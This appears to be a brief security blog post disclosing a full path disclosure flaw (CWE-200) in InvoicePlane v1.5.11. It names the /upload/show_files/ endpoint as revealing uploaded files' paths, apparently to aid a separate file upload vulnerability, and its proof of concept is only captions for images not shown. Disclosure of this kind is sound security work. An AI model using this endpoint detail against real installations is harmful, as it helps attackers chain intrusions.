InvoicePlane is one of the popular open-source CRM. During the search for a PHP based open-source CRM in Github, this comes mostly within first ten.

The latest version of InvoicePlane (v1.5.11) has several vulnerabilities. Without further wasting your time let’s dive into the details.

  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Full Path Disclosure

In the file upload vulnerability the same system has, there was no direct way to identify the file uploaded path without reading the source code. If there is a custom installation, the upload path can be modified via the UPLOADS_FOLDER constant in the index.php. But /upload/show_files/ allows the attacker to read the full path of the uploaded file.

Proof of Concept

invoiceplane path discloure request

invoiceplane path discloure response